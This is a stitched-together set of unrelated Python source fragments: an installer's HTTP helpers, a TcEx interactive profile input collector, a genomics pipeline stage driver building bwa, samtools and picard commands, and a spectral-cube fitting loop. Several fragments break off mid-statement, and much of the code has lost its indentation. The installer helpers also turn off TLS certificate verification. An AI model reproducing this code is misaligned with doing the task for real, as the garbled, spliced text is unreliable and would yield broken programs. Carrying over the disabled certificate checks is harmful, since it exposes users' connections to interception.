self.log_it('OS Type: %s OS Version: %s' % (self.os_type, self.os_version))
def detect_initd(self):
self.os_initdaemon = open(os.path.join('/proc/1/status'), 'r').read().split()[1]
    def http_post_call(self, endpoint, payload):
        """POST *payload* as JSON to *endpoint* and return the decoded response.

        TLS verification is disabled (the installer talks to services with
        self-signed certificates). On any request failure or a non-OK status
        the installer terminates via self.exit.

        Args:
            endpoint: Full URL to POST to.
            payload: JSON-serializable request body.

        Returns:
            dict: The parsed JSON response when the request succeeds.
        """
        response = None
        try:
            response = requests.post(endpoint, data=json.dumps(payload), headers={'content-type': 'application/json'}, verify=False)
            # NOTE(review): json.loads raises before the status check if the
            # body is not JSON — that error is not one of the caught types.
            response_json = json.loads(response.text)
            if response.ok:
                return response_json
            else:
                message = """Error: Failed Not Ok Endpoint: %s
                Payload %s
                Response %s
                Response_Json %s
                Please check logs.""" % (endpoint, payload, response, response_json)
                self.exit(message)
        except requests.exceptions.HTTPError as e:
            message = """Error: Failed Http Error:
            Endpoint: %s
            Payload %s
            Response %s
            Error %s
            Please check logs.""" % (endpoint, payload, response, e)
            self.exit(message)
        except requests.exceptions.ConnectionError as e:
            message = """Error: Failed to Connect:
            Endpoint: %s
            Payload %s
            Response %s
            Error %s
            Please check logs.""" % (endpoint, payload, response, e)
            self.exit(message)
        except requests.exceptions.RequestException as e:
            # catch-all for any other requests failure (timeouts, etc.)
            message = """Error: Failed Something Else:
            Endpoint %s
            Payload %s
            Response %s
            Error %s
            Please check logs.""" % (endpoint, payload, response, e)
            self.exit(message)
    def http_get_call(self, endpoint):
        """GET *endpoint* and return the decoded JSON response.

        TLS verification is disabled (self-signed certificates). On any
        request failure the installer terminates via self.exit.

        Args:
            endpoint: Full URL to GET.

        Returns:
            dict: The parsed JSON response.
        """
        response = None
        try:
            response = requests.get(endpoint, headers={'content-type': 'application/json'}, verify=False)
            # NOTE(review): unlike http_post_call there is no status check
            # here; a non-OK JSON body is returned as-is.
            response_json = json.loads(response.text)
            return response_json
        except requests.exceptions.HTTPError as e:
            message = """Error: Failed Http Error:
            Endpoint: %s
            Response %s
            Error %s
            Please check logs.""" % (endpoint, response, e)
            self.exit(message)
        except requests.exceptions.ConnectionError as e:
            message = """Error: Failed to Connect:
            Endpoint: %s
            Response %s
            Error %s
            Please check logs.""" % (endpoint, response, e)
            self.exit(message)
        except requests.exceptions.RequestException as e:
            # catch-all for any other requests failure (timeouts, etc.)
            message = """Error: Failed Something Else:
            Endpoint %s
            Response %s
            Error %s
            Please check logs.""" % (endpoint, response, e)
            self.exit(message)
def exit(self, message):
print (message)
self.log_it(message, True)
sys.exit()
def configure_kong_rotate(self):
self.log_it("Configuring log rotate for kong")
self.run([self.cmd_cp, '%s/%s' % (self.template_folder, self.kong_log_rotate_config_file), "%s/kong" % self.dist_kong_log_rotate_config_path])
def check_root(self):
try:
user = pwd.getpwuid(os.getuid()).pw_name
print (user)
if user != "root":
msg="Your user is not root user, Run setup script in root user."
print (msg)
self.log_it(msg, True)
sys.exit()
except Exception as err:
self.log_it("Failed to execute `pwd.getpwuid(os.getuid()).pw_name` | |
<filename>tcex/profile/interactive.py
"""TcEx testing profile Class."""
# standard library
import json
import math
# import os
import re
import sys
from base64 import b64encode
from typing import Optional, Union
# third-party
import colorama as c
# autoreset colorama
c.init(autoreset=True, strip=False)
class Interactive:
"""Testing Profile Interactive Class."""
    def __init__(self, profile: object):
        """Initialize Class properties.

        Args:
            profile (Profile): The profile object to build interactive inputs.
        """
        self.profile = profile

        # properties
        # Collected inputs, bucketed by whether install.json marks them required.
        self._inputs = {
            'optional': {},
            'required': {},
        }
        # Text shown for (and compared against) the "no selection" menu entry.
        self._no_selection_text = 'No Selection'
        # Values staged into the KV store, keyed by playbook variable.
        self._staging_data = {'kvstore': {}}
        # self._user_defaults = None
        # Dispatch table: playbook data type -> collector method.
        self.collect_type_map = {
            'Any': self.collect_string,
            'Binary': self.collect_binary,
            'BinaryArray': self.collect_binary_array,
            'KeyValue': self.collect_key_value,
            'KeyValueArray': self.collect_key_value_array,
            'String': self.collect_string,
            'StringArray': self.collect_string_array,
            'TCEntity': self.collect_tcentity,
            'TCEntityArray': self.collect_tcentity_array,
        }
        # Exit codes gathered while presenting inputs.
        self.exit_codes = []
        # Dispatch table: install.json input type -> presenter method.
        self.input_type_map = {
            'boolean': self.present_boolean,
            'choice': self.present_choice,
            'keyvaluelist': self.present_key_value_list,
            'multichoice': self.present_multichoice,
            'string': self.present_string,
            'editchoice': self.present_editchoice,
        }
        # self.user_defaults_filename = os.path.join('tests', '.user_defaults')
    def _default(self, data: dict) -> Union[list, str]:  # pylint: disable=unused-argument
        """Return the best option for default.

        Args:
            data: The install.json params object.

        Returns:
            list, str: The default value for the input.
        """
        if data.get('type').lower() == 'boolean':
            # booleans are normalized to the lowercase strings 'true'/'false'
            default = str(data.get('default', 'false')).lower()
        elif data.get('type').lower() == 'choice':
            default = 0
            valid_values: list = self._expand_valid_values(data.get('validValues', []))
            if data.get('name') == 'tc_action':
                # prefer the action whose name matches the current feature
                for vv in valid_values:
                    if self.profile.feature.lower() == vv.replace(' ', '_').lower():
                        default = vv
                        break
            else:
                default: str = data.get('default')
        elif data.get('type').lower() == 'multichoice':
            default: str = data.get('default')
            if default is not None and isinstance(default, str):
                # install.json encodes multichoice defaults pipe-delimited
                default: list = default.split('|')
        else:
            default = data.get('default')
        # if default is None:
        #     # set default from user default file
        #     default = self.user_defaults.get(data.get('name'))
        return default
def _expand_valid_values(self, valid_values: list) -> list:
"""Expand supported playbook variables to their full list.
Args:
valid_values (list): The list of valid values for Choice or MultiChoice inputs.
Returns:
list: An expanded list of valid values for Choice or MultiChoice inputs.
"""
valid_values = list(valid_values)
if '${ARTIFACT_TYPES}' in valid_values:
valid_values.remove('${ARTIFACT_TYPES}')
valid_values.extend(
[
'ASN',
'Asset Group ID',
'Certificate File',
'CIDR',
'Credential ID',
'Document Metadata',
'Email Address',
'Email Attachment File',
'Email Attachment File Name',
'Email Body',
'Email Message File',
'Email Subject',
'Event File',
'Exploit ID',
'File Hash',
'Filter ID',
'Hashtag',
'Host',
'Image File',
'IP Address',
'Log File',
'MutEx',
'PCAP File',
'Policy ID',
'Registry Key',
'Results ID',
'Screenshot File',
'Tactic ID',
'Technique ID',
'Ticket ID',
'Timestamp',
'URL',
'User Agent',
'Vulnerability Detection ID',
'Vulnerability ID',
]
)
elif '${GROUP_TYPES}' in valid_values:
valid_values.remove('${GROUP_TYPES}')
valid_values.extend(
[
'Adversary',
'Attack Pattern',
'Campaign',
'Course of Action',
'Document',
'Email',
'Event',
'Incident',
'Intrusion Set',
'Malware',
'Report',
'Signature',
'Tactic',
'Task',
'Threat',
'Tool',
'Vulnerability',
]
)
elif '${INDICATOR_TYPES}' in valid_values:
valid_values.remove('${INDICATOR_TYPES}')
r = self.profile.session.get('/v2/types/indicatorTypes')
if r.ok:
valid_values.extend(
[t.get('name') for t in r.json().get('data', {}).get('indicatorType', {})]
)
elif '${OWNERS}' in valid_values:
valid_values.remove('${OWNERS}')
r = self.profile.session.get('/v2/owners')
if r.ok:
valid_values.extend(
[o.get('name') for o in r.json().get('data', {}).get('owner', {})]
)
elif '${USERS}' in valid_values:
valid_values.remove('${USERS}')
r = self.profile.session.get('/v2/owners/mine/members')
if r.ok:
valid_values.extend(
[o.get('userName') for o in r.json().get('data', {}).get('user', {})]
)
elif '${USER_GROUPS}' in valid_values:
valid_values.remove('${USER_GROUPS}')
valid_values.extend(['User Group 1', 'User Group 1'])
return valid_values
    def _input_value(self, label: str, option_text: Optional[str] = None) -> str:
        """Return user input.

        Args:
            label: The label to display to the user.
            option_text: the Option text to display to the user.

        Returns:
            str: The value selected by the user.
        """
        # update option text to include help message
        option_text = option_text or ''
        if option_text:
            # add space for cleaness in user display
            option_text = f' {option_text}'
        print(f'{c.Fore.WHITE}[? for help]')
        prompt = f'{c.Fore.MAGENTA}{label}{c.Fore.RESET}{c.Style.BRIGHT}{option_text}: '
        input_value = input(prompt).strip()  # nosec

        # handle special user inputs
        if input_value == '?':
            # show the help screen, then re-prompt for a real value
            self.present_help()
            return self._input_value(label, option_text)

        return input_value
@staticmethod
def _split_list(data: list) -> tuple:
"""Split a list in two "equal" parts.
Args:
data: The list of data to split into two equal parts.
Returns:
tuple: The two halves of the list.
"""
half: int = math.ceil(len(data) / 2)
return data[:half], data[half:]
def add_input(self, name: str, data: dict, value: str) -> None:
"""Add an input to inputs.
Args:
name: The name of the input.
data: The install.json params object.
value: The value for the input.
"""
if data.get('required', False):
self._inputs['required'].setdefault(name, value)
else:
self._inputs['optional'].setdefault(name, value)
# def add_user_default(self, key, value, data_type=None):
# """Add data to user default."""
# self.user_defaults.setdefault(self.profile.feature, {})
# if data_type is None:
# self.user_defaults[self.profile.feature][key] = value
# else:
# # store the value under the appropriate data type
# self.user_defaults[self.profile.feature].setdefault(key, {})
# self.user_defaults[self.profile.feature][key].setdefault(data_type, value)
# if self.user_defaults.get('base') is None:
# self.user_defaults['base'] = self.user_defaults[self.profile.feature]
    def add_staging_data(self, name: str, type_: str, value: str) -> str:
        """Create staging data and return variable value.

        For non-trigger apps a playbook variable is created (via
        profile.ij.create_variable) and the raw value is staged in the
        kvstore under that variable; trigger services get the raw value.

        Args:
            name: The name of the input.
            type_: The type of input (Binary, StringArray, etc.)
            value: The value to write in the staging data.

        Returns:
            str: The newly create variable string.
        """
        arg_value = value
        if (
            self.profile.ij.runtime_level.lower() not in ['triggerservice', 'webhooktriggerservice']
            and value is not None
        ):
            # playbook apps read their inputs through kvstore variables
            arg_value: str = self.profile.ij.create_variable(name, type_)
            self._staging_data['kvstore'].setdefault(arg_value, value)

        return arg_value
    def collect_binary(self, **kwargs) -> str:
        """Collect binary data from the user, returned base64-encoded.

        Args:
            default (str, kwargs): The default value if no value provided by user.
            feedback (bool, kwargs): If True user feedback will be printed.
            option_text (str, kwargs): The text shown to the user.
            required (str, kwargs): If True the user cannot continue until they provide a value.

        Returns:
            str: The input str from the user.
        """
        input_value: str = self._input_value('Input', kwargs.get('option_text'))
        if not input_value:
            # if no default value and required force user to input again
            if kwargs.get('default') is None and kwargs.get('required') is True:
                self.print_required()
                return self.collect_binary(**kwargs)

        if input_value not in [None, '']:
            # typed input is base64-encoded before being staged
            input_data: str = b64encode(input_value.encode()).decode()
            feedback = f'{input_value} -> ({input_data})'
        else:
            # fall back to the default — NOTE(review): used as-is, presumably
            # already base64-encoded; confirm against callers.
            input_data: str = kwargs.get('default')
            feedback = input_data

        # print user feedback
        if kwargs.get('feedback', True):
            self.print_feedback(feedback)

        return input_data
    def collect_binary_array(self, **kwargs) -> list:
        """Collect an array of binary values, one per prompt, until blank.

        Args:
            required (str, kwargs): If True the user cannot continue until they provide a value.

        Returns:
            list: The input list from the user.
        """
        input_values = []
        required = kwargs.get('required', False)
        while True:
            # per-item feedback is suppressed; printed once at the end
            input_value = self.collect_binary(feedback=False, required=required)
            if not input_value:
                break
            input_values.append(input_value)
            required = False  # only the first input is required

        if not input_values:
            # return None to ensure data doesn't get added to inputs
            input_values = None

        # print user feedback
        self.print_feedback(input_values)

        return input_values
    def collect_boolean(self, **kwargs) -> bool:
        """Collect boolean data.

        Args:
            default (str, kwargs): The default value if no value provided by user.
            option_text (str, kwargs): The text shown to the user.

        Returns:
            bool: The boolean value select by the user.
        """
        input_value = self._input_value('Input', kwargs.get('option_text'))
        if input_value == '':
            input_value = kwargs.get('default')

        # accept the common textual spellings only; anything else re-prompts
        if str(input_value).lower() not in ['0', 'f', 'false', '1', 't', 'true']:
            self.print_invalid_bool()
            return self.collect_boolean(**kwargs)

        # covert input value to a proper boolean
        input_value = self.profile.utils.to_bool(input_value)

        # print user feedback
        self.print_feedback(input_value)

        return input_value
def collect_editchoice(self, **kwargs) -> str:
"""Collect edit choice data
Args:
default (str, kwargs): The default value if no value provided by user.
option_text (str, kwargs): The text shown to the user.
required (str, kwargs): If True the user cannot continue until they provide a value.
valid_values (str, kwargs): A list of valid values
Returns:
str: The users selected choice.
"""
# collect input value from user and set default if required
input_value: str = self._input_value('EditChoice', kwargs.get('option_text')) or kwargs.get(
'default'
)
# ensure input value is provided when input is required
if input_value is None and kwargs.get('required') is True:
self.print_required()
return self.collect_editchoice(**kwargs)
# if input value is None then there is not need to continue
if input_value is None:
return input_value
# set valid values
valid_values: list = kwargs.get('valid_values', [])
# convert to int or recollect input
try:
input_value = int(input_value)
is_between = 0 <= input_value <= (len(valid_values) - 1)
if not is_between:
self.print_invalid_index(f'0-{len(valid_values)}')
return self.collect_editchoice(**kwargs)
input_value = valid_values[input_value]
if input_value == self._no_selection_text:
# special case for when user select no selection
input_value = None
except ValueError:
self.print_feedback(f'Using custom input {input_value}.')
# print user feedback
if kwargs.get('feedback', True):
self.print_feedback(input_value)
return input_value
def collect_choice(self, **kwargs) -> str:
"""Collect choice data
Args:
default (str, kwargs): The default value if no value provided by user.
option_text (str, kwargs): The text shown to the user.
required (str, | |
#!/usr/bin/env python3
from __future__ import division, print_function
from string import Template
from CommandRunner import *
from ECUtils import *
import tempfile
import xml.etree.ElementTree as ET
import logging
import sys,os,re
import subprocess
import signal
import argparse
import string
import glob
import traceback
import random
class Protocol(object):
    """Parsed representation of an XML run protocol.

    The protocol file is read once at construction time and its settings
    (reference, read files, output directory, tool paths, quality cutoffs,
    cluster configuration) are exposed as instance attributes. Any fatal
    inconsistency in the protocol terminates the program with exit status 1.
    """
    def __init__(self, protocol):
        """Store the protocol path and parse it immediately.

        Args:
            protocol: Path to the XML protocol file.
        """
        self.protocol = protocol
        self.parseProtocol()

    def parseProtocol(self):
        """Validate the protocol XML and populate all instance attributes."""
        try:
            p = ET.parse(self.protocol)
        except Exception:
            logging.critical("Input protocol not formatted correctly at {}".format(self.protocol))
            sys.exit(1)
        # --- reference ---
        Reference = p.find('reference')
        if Reference is None:
            # Fixed: previously only logged and then crashed on Reference.text.
            logging.critical('Reference not correctly provided in protocol at {}'.format(self.protocol))
            sys.exit(1)
        self.reference = Reference.text
        if not os.path.exists(self.reference):
            logging.critical('The provided reference at {} does not exist'.format(self.reference))
            sys.exit(1)
        # --- input reads ---
        InBaseDir = p.find('input')
        if InBaseDir is None:
            logging.critical('Input directory not correctly provided in protocol at {}'.format(self.protocol))
            sys.exit(1)
        self.inBaseDir = InBaseDir.attrib.get("baseDir", '')
        Pair1 = InBaseDir.find('p1')
        Pair2 = InBaseDir.find('p2')
        NPairs = InBaseDir.find('nPairs')
        deduplicate = InBaseDir.find('deduplicate')
        if Pair1 is None:
            logging.critical('Read file not correctly provided in protocol at {}'.format(self.protocol))
            sys.exit(1)
        self.pair1 = os.path.join(self.inBaseDir, Pair1.text)
        # pair2 is optional: single-end runs provide only p1
        self.pair2 = None if Pair2 is None else os.path.join(self.inBaseDir, Pair2.text)
        if NPairs is None:
            logging.critical('Must provide number of read pairs in protocol at {}\n'
                             '\tEg: run cat yourReadFile.fq | grep \'^@\' | wc -l'.format(self.protocol))
            sys.exit(1)
        self.nPairs = int(NPairs.text)
        absentPair = None
        if not os.path.exists(self.pair1):
            absentPair = self.pair1
        elif self.pair2 is not None and not os.path.exists(self.pair2):
            absentPair = self.pair2
        if absentPair:
            logging.critical('The provided readfile at {} does not exist'.format(absentPair))
            sys.exit(1)
        if deduplicate is not None:
            if deduplicate.text == 'true':
                self.deduplicate = True
            elif deduplicate.text == 'false':
                # Fixed: the original compared the still-unset attribute
                # self.deduplicate and used '==' instead of '=', so any
                # value other than 'true' crashed with AttributeError.
                self.deduplicate = False
            else:
                logging.critical("The deduplicate tag may only have the values"
                                 "'true' or 'false'. The provided value is"
                                 "'{}'".format(deduplicate.text))
                sys.exit(1)
        else:
            self.deduplicate = False
        # --- ploidy ---
        ploidy = p.find('ploidy')
        if ploidy is None:
            logging.warning('No ploidy was provided in the protocol. Assuming a diploid sample!')
            # NOTE(review): default is the int 2 while an explicit tag yields
            # a string — kept as-is for backward compatibility; confirm users.
            self.ploidy = 2
        else:
            self.ploidy = ploidy.text
        # --- output directory / threads ---
        Outdir = p.find('outputDir')
        self.outDir = os.getcwd() if Outdir is None else Outdir.text
        NThreads = p.find('threads')
        self.nThreads = NThreads.text if NThreads is not None else '1'
        # --- cluster configuration (optional) ---
        Cluster = p.find('cluster')
        if Cluster is None:
            self.cmdTemplate = None
            self.nJobs = 0
        else:
            if Cluster.find('nJobs') is not None:
                self.nJobs = int(Cluster.find('nJobs').text)
            else:
                self.nJobs = 0
            if Cluster.find('template') is None:
                logging.critical('Cluster tag provided but template absent at {}'.format(self.protocol))
                sys.exit(1)
            else:
                self.cmdTemplate = Cluster.find('template').text
        # --- paths ---
        paths = p.find('paths')
        # The 'scripts' tag is mandatory: it locates the pipeline's helpers.
        # Fixed: the original crashed with AttributeError when <paths> was
        # absent and continued with scriptBase unset when <scripts> was.
        if paths is not None and paths.find('scripts') is not None:
            self.scriptBase = paths.find('scripts').text
        else:
            logging.critical("You need to provide the 'scripts' tag within the"
                             " 'paths' tag in the protocol!")
            sys.exit(1)
        # Minimum quality values for SNVs and indels (default 30).
        minSNVQ = p.find('minSNVQ')
        self.minSNVQ = int(minSNVQ.text) if minSNVQ is not None else 30
        minIndelQ = p.find('minIndelQ')
        self.minIndelQ = int(minIndelQ.text) if minIndelQ is not None else 30
        # Default tool paths; overridden below when provided in <paths>.
        self.bwa = 'bwa'
        self.samtools = 'samtools'
        self.picardtools = 'picard.jar'
        self.gatk = 'gatk'
        # Fixed typo: was assigned to self.pyhton3, leaving python3 unset
        # whenever the protocol did not override it.
        self.python3 = 'python3'
        self.tmpdir = '$TMPDIR'
        self.java = 'java'
        if paths is not None:
            for tag in ('bwa', 'samtools', 'picardtools', 'gatk', 'java', 'python3', 'tmpdir'):
                node = paths.find(tag)
                if node is not None:
                    setattr(self, tag, node.text)
        # Bake java's tmpdir flag in once so commands don't have to add it.
        self.java += ' -Djava.io.tmpdir={}'.format(self.tmpdir)
class StageDriver(object):
'''
This object holds the command construction methods for all stages of the
pipeline. These methods don't do any computation by themselves, but build
the commands to call the scripts that do.
'''
    def __init__(self, protocolFile, stage, piped):
        """Build and dispatch the commands for one pipeline stage.

        Parses the protocol, determines the current iteration from existing
        ITERATION_* folders, creates the stage directory, builds the stage's
        commands and hands them to the CommandRunner.

        Args:
            protocolFile: Path to the XML protocol describing the run.
            stage: Name of the stage to execute (one of self.stages).
            piped: When True, unscattered stages chain the next stage onto
                their own command instead of returning control.
        """
        #how are we and our protocol called?
        self.name=sys.argv[0]
        self.protocolName=protocolFile
        #parse the protocol
        self.stage=stage
        self.piped=piped
        self.MyProtocol=Protocol(protocolFile)
        self.runCmd = CommandRunner(self.MyProtocol.cmdTemplate, \
                self.MyProtocol.nJobs)
        #detect in what iteration we are currently at
        iterationFolders=[i.replace('ITERATION_', '') \
                for i in glob.glob(os.path.join(self.MyProtocol.outDir,\
                'ITERATION_*'))]
        #catch exception if theres no iterationfolder yet
        try:
            self.iteration=max(sorted(map(lambda f: int(f), \
                    map(lambda f: os.path.basename(f),\
                    iterationFolders))))
        except ValueError:
            self.iteration=1
        self.baseDir=os.path.join(self.MyProtocol.outDir,\
                "ITERATION_{}".format(self.iteration))
        if not os.path.exists(self.baseDir):
            os.mkdir(self.baseDir)
        self.stages=['setup', 'index', 'map', 'merge', 'prepvarcall', 'varcall', \
                'varintegration', 'reindex', 'remap', 'remerge', 'correction']
        self.stage=stage
        #try to get the next stage:
        try:
            self.nextStage=self.stages[self.stages.index(stage)+1]
        except IndexError:
            #if the stage is correction, the next one is index in next iter
            self.nextStage='index'
        #try to get the previous stage:
        # NOTE(review): for 'setup' (index 0) this yields stages[-1]
        # ('correction'), not an IndexError — confirm intended.
        try:
            previousStage=self.stages[self.stages.index(stage)-1]
        except IndexError:
            previousStage=None
        #get/create the stage specific directory
        if previousStage is not None:
            self.previousStageDir=os.path.join(self.baseDir, previousStage)
        self.stageDir=os.path.join(self.baseDir, stage)
        #if stage is setup, set the thing outside of the nestings:
        if stage=='setup':
            self.stageDir=os.path.join(self.MyProtocol.outDir, 'setup')
        #we're gonna need the path to the index directory sometimes:
        self.indexDir=os.path.join(self.baseDir, 'index')
        #create the directory for the current stage, put setup outside of nestings
        if not os.path.exists(self.stageDir):
            os.mkdir(self.stageDir)
        #if the directory exists and is not empty, we're not touching it..
        elif os.listdir(self.stageDir) != []:
            logging.critical('Stage directory {} for iteration {} exists and '\
                    'is not empty! Please check its contents and '\
                    'delete them if necessary.'.format(self.stage, self.iteration))
            logging.critical('Exiting...')
            sys.exit(1)
        #run stage
        # Dispatch: each builder returns (commands, working directory).
        if stage=="setup":
            commands, wDir=self.setup()
        elif stage=="index":
            commands, wDir=self.index(self.iteration, reindex=False, piped=self.piped)
        elif stage=="reindex":
            commands, wDir=self.index(self.iteration, reindex=True, piped=self.piped)
        elif stage=="map":
            commands, wDir=self.mapping(self.iteration, remap=False)
        elif stage=="remap":
            commands, wDir=self.mapping(self.iteration, remap=True)
        elif stage=="merge":
            commands, wDir=self.merge_bam(self.iteration, remerge=False, piped=self.piped)
        elif stage=="remerge":
            commands, wDir=self.merge_bam(self.iteration, remerge=True, piped=self.piped)
        elif stage=="prepvarcall":
            commands, wDir=self.prep_varcall(self.iteration, piped=self.piped)
        elif stage=="varcall":
            commands, wDir=self.varcall(self.iteration)
        elif stage=="varintegration":
            commands, wDir=self.varintegration(self.iteration, piped=self.piped)
        elif stage=="correction":
            commands, wDir=self.correction(self.iteration, piped=self.piped)
        else:
            #because calls to non existing stages should be filtered by argparser
            logging.warning('Man..this error should really really not occur...')
            sys.exit(1)
        #autocall next stage for unscattered stages
        # Piped mode: builders that returned a bare command string (wDir is
        # None) get the next stage's invocation appended and are wrapped here.
        if self.piped and wDir==None:
            nextStageCmd=self.selfCall(self.nextStage)
            commands=self.constructCommand(self.stage, commands+nextStageCmd)
            wDir=self.stageDir
        logging.debug("CommandRunner Returned: " +
                str(self.runCmd(commands, wDir, self.stage )) )
        logging.info("Finished %s Stage: %s" % (self.runCmd.runType, self.stage))
##############################
####STAGE DRIVER FUNCTIONS####
##############################
    def setup(self):
        '''
        Create the job that checks the reference headers and chunks up the
        read files if necessary (delegated to ECsetup.py).

        Returns:
            (list, str): the Command objects to run and their working dir.
        '''
        #readDir=os.path.join(self.MyProtocol.outDir,'READS')
        readDir=self.stageDir
        retCmd = list()
        setupScript=os.path.join(self.MyProtocol.scriptBase, \
                'ECsetup.py')
        logging.info('Calling setup script located at {}'.format(setupScript))
        cmd=string.Template('${ECSetupPath} ${reference} '\
                '${pair1} ${pair2} ${outDir} ${nPairs}').\
                substitute({'ECSetupPath': setupScript,\
                'reference': self.MyProtocol.reference,\
                'pair1': self.MyProtocol.pair1,\
                'pair2': self.MyProtocol.pair2,\
                'outDir': readDir,\
                'nPairs': self.MyProtocol.nPairs})
        # NOTE(review): nJobs is an int (0 when no cluster is configured), so
        # this check is always True and '-nChunks 0' can be emitted — confirm.
        if self.MyProtocol.nJobs is not None:
            cmd+=' -nChunks {}'.format(self.MyProtocol.nJobs)
        cmd+=';\n'
        logging.debug("Running command: {}".format(cmd))
        retCmd.append(Command(cmd, 'setup', os.path.join(readDir,"setup.out"), \
                os.path.join(readDir,"setup.err")))
        return retCmd, readDir
    def index(self, iteration, reindex=False, piped=False):
        '''
        create job to index a reference
        reference nomenclature:
        first pass: reference.fa
        after varcall: reference.varcall.integrated.fa
        after qc: reference.varcall.PASS.fa

        Symlinks the appropriate reference into the stage directory, then
        builds the bwa-index command (plus faidx and a Picard sequence
        dictionary on a first index). Returns (commands, workdir), or
        (command-string, None) when piped.
        '''
        retCmd=list()
        #!!create sequence dict and fai !!
        if not reindex:
            #reference=os.path.join(self.baseDir,'reference.fa')
            reference=os.path.join(self.stageDir,'reference.fa')
            if iteration==1:
                # first iteration: link the user-provided reference
#           if not os.path.exists(self.baseDir):
#               os.mkdir(self.baseDir)
                os.symlink(self.MyProtocol.reference, reference)
            #build command
            elif iteration!=1:
                # later iterations: link the corrected output of the
                # previous iteration
                lastPass=os.path.join(*[self.MyProtocol.outDir, \
                        'ITERATION_{}'.format(iteration-1),\
                        'correction',\
                        'reference.sanitizedVariants.fa'])
                os.symlink(lastPass, reference)
        else:
#           reference=os.path.join(self.baseDir, 'reference.varcall.integrated.fa')
            reference=os.path.join(self.previousStageDir, 'reference.varcall.integrated.fa')
            varRef=os.path.join(self.stageDir, 'reference.varcall.integrated.fa')
            os.symlink(reference, varRef)
            reference=varRef
        # NOTE(review): seqdict stays undefined when the reference ends with
        # neither '.fasta' nor '.fa' — a NameError would follow in the
        # non-reindex branch; confirm inputs are always .fa/.fasta.
        if reference.endswith('fasta'):
            seqdict=reference.replace(".fasta", ".dict")
        elif reference.endswith('.fa'):
            seqdict=reference.replace(".fa", ".dict")
        if reindex:
            cmd=string.Template('${bwa} index ${reference};\n')\
                    .substitute({'bwa': self.MyProtocol.bwa,
                        'reference': reference})
        else:
            cmd=string.Template('${bwa} index ${reference}\n'\
                    '${samtools} faidx ${reference};\n'\
                    '${java} -jar ${picard} CreateSequenceDictionary '\
                    'R=${reference} O=${seqdict};\n')\
                    .substitute({'bwa': self.MyProtocol.bwa,
                        'reference': reference,
                        'samtools': self.MyProtocol.samtools,
                        'java': self.MyProtocol.java,
                        'picard': self.MyProtocol.picardtools,
                        'seqdict': seqdict})
        #if were piping stages, just retrun the command string
        if piped:
            return cmd, None
        #else construct the command actual command object
        j='reindex' if reindex else 'index'
        stdout=os.path.join(self.baseDir, j+".out")
        stderr=os.path.join(self.baseDir, j+".err")
        retCmd.append(Command(cmd,j,stdout, stderr))
        return retCmd, self.stageDir
def mapping(self, iteration, remap=False):
    '''
    Create one bwa-mem mapping job per read pair found in the setup stage.

    Args:
        iteration: iteration number (kept for interface parity with the
            other stage methods; not used here).
        remap: if True, map against the variant-integrated reference and
            name outputs ``*_remap.bam``; otherwise use the plain reference
            and ``*_map.bam``.

    Returns:
        ([Command], stageDir); exits the process if the read directory or
        the read pairs are missing.
    '''
    retCmd = list()
    if remap:
        outfileSuffix = '_remap.bam'
        reference = os.path.join(self.previousStageDir,
                                 'reference.varcall.integrated.fa')
    else:
        outfileSuffix = '_map.bam'
        reference = os.path.join(self.previousStageDir, 'reference.fa')
    # build commands: bwa mem -> samtools view -> samtools sort pipeline
    cmdTemplate = string.Template("${bwa} mem -M -t ${threads} -R"
                                  "'@RG\\tID:dummy\\tSM:dummy\\tLB:dummy' "
                                  "${reference} ${pair1} ${pair2} |"
                                  "${samtools} view -@ ${threads} -Shb - |"
                                  "${samtools} sort -@ ${threads} -O bam "
                                  "-T ${tmpBam} -o ${outfile} -;\n")
    # (was a redundant nested os.path.join)
    readDir = os.path.join(self.MyProtocol.outDir, 'setup')
    if not os.path.exists(readDir):
        logging.critical("Read directory does not exist. Did you run the setup stage?")
        sys.exit(1)
    pairs = glob.glob(os.path.join(readDir, '*.fq'))
    if not pairs:
        logging.critical("There are no read pairs in {}".format(readDir))
        sys.exit(1)
    # get basenames of pairs and remove .p[12].fq
    # NOTE: dots are escaped now; the old pattern '.p[12].fq' treated them
    # as any-character wildcards
    pairs = set(os.path.basename(re.sub(r'\.p[12]\.fq', '', pair)) for pair in pairs)
    for pairPrefix in pairs:
        # check if we're dealing with single-end reads (no second mate file)
        if self.MyProtocol.pair2 is None:
            pair2 = ''
        else:
            pair2 = os.path.join(readDir, pairPrefix + '.p2.fq')
        # random suffix keeps samtools-sort temp files of parallel jobs apart
        randString = ''.join(random.choice(string.ascii_uppercase + string.digits)
                             for _ in range(6))
        cmd = cmdTemplate.substitute({'bwa': self.MyProtocol.bwa,
                                      'samtools': self.MyProtocol.samtools,
                                      'threads': self.MyProtocol.nThreads,
                                      'reference': reference,
                                      'pair1': os.path.join(readDir,
                                                            pairPrefix + '.p1.fq'),
                                      'pair2': pair2,
                                      'tmpBam': os.path.join(self.stageDir,
                                                             randString),
                                      'outfile': os.path.join(self.stageDir,
                                                              pairPrefix + outfileSuffix)})
        j = 'remap' if remap else 'map'
        stdout = os.path.join(self.stageDir, j + '.out')
        stderr = os.path.join(self.stageDir, j + '.err')
        logging.debug('Executing {}'.format(cmd))
        # previously an identical Command was constructed twice and the first
        # instance discarded; build it exactly once
        retCmd.append(Command(cmd, j, stdout, stderr))
    return retCmd, self.stageDir
def merge_bam(self, iteration, remerge=False, piped=False):
'''
construct command to merge bamfiles
*_map.bam -> first mapping
*_remap.bam -> second mapping for coverage
also create index
'''
retCmd=list()
if not remerge:
bamFilesList=glob.glob(os.path.join(self.previousStageDir,'*_map.bam'))
bamout=os.path.join(self.stageDir,'merged.map.bam')
deduped=os.path.join(self.stageDir,'merged.map.deduped.bam')
else:
bamFilesList=glob.glob(os.path.join(self.previousStageDir,'*_remap.bam'))
bamout=os.path.join(self.stageDir,'merged.remap.bam')
deduped=os.path.join(self.stageDir,'merged.remap.deduped.bam')
#set some paths
bamFiles=" ".join(bamFilesList)
metrics=os.path.join(self.stageDir,'dedupmetrics.txt')
pair1=os.path.join(*[self.MyProtocol.outDir, 'setup', 'pair1.deduped.fq'])
| |
self.parcube[:,int(y),int(x)] = blank_value
self.errcube[:,int(y),int(x)] = blank_value
if integral:
self.integralmap[:,int(y),int(x)] = blank_value
self._counter += 1
if verbose:
if ii % (min(10**(3-verbose_level),1)) == 0:
snmsg = " s/n=%5.1f" % (max_sn) if max_sn is not None else ""
npix = len(valid_pixels)
pct = 100 * (ii+1.0)/float(npix)
log.info("Finished fit %6i of %6i at (%4i,%4i)%s. Elapsed time is %0.1f seconds. %%%01.f" %
(ii+1, npix, x, y, snmsg, time.time()-t0, pct))
if sp.specfit.modelerrs is None:
log.exception("Fit number %i at %i,%i failed with no specific error." % (ii,x,y))
